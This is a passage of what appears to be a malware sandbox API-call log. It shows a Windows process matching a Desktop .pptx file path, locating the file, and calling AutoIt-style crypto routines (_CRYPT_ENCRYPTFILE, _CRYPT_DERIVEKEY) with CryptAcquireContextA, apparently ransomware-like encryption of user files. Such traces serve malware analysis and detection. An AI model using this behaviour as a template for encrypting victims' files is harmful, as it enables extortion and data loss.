lpString2="flyingship", cchCount2=10) returned 1 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wnBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nBTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BTD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TD\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VmWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mWpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WpxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pxwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xwQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wQdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QdQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dQUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QUQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UQhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QhtrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="htrKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="trKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rKz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kz9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z9rx.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.424] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0075.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0075.424] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0075.424] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0075.424] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0075.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0075.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.425] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0075.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0075.425] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0075.425] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0075.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd60 [0075.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0075.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690960 [0075.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0075.425] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0075.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.425] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0075.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0075.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0075.425] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx", lpFindFileData=0x61e870 | out: lpFindFileData=0x61e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e4617a0, ftCreationTime.dwHighDateTime=0x1d5e321, ftLastAccessTime.dwLowDateTime=0x787174a0, ftLastAccessTime.dwHighDateTime=0x1d5d7ed, ftLastWriteTime.dwLowDateTime=0x787174a0, ftLastWriteTime.dwHighDateTime=0x1d5d7ed, nFileSizeHigh=0x0, nFileSizeLow=0x3ec3, dwReserved0=0x61e9c0, dwReserved1=0x657690, cFileName="VmWpxwQdQUQhtrKz9rx.pptx", cAlternateFileName="VMWPXW~1.PPT")) returned 0x6b8b38 [0075.426] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0075.426] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0075.426] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.426] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0075.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.426] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.426] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0075.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0075.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.426] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0075.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0075.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0075.427] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77710000 [0075.427] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0075.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.427] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0075.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.427] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0075.427] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.427] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.427] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0075.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0075.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0075.427] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0075.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0075.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0075.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0075.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.428] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.428] PeekMessageW (in: lpMsg=0x61e57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e57c) returned 0 [0075.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.428] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0075.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0075.428] CryptAcquireContextA (in: phProv=0x61e550, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x61e550*=0x696ad0) returned 1 [0075.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0075.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0075.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0075.429] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0075.430] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a0e10 [0075.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0075.430] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0075.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.430] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0075.430] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.430] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.430] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.430] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.430] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0075.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.430] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.430] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.430] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.430] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.431] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b38 [0075.431] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.431] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.431] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0075.431] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbf8 [0075.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0075.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0075.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0075.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb648 [0075.431] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0075.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dae0 [0075.431] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.431] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 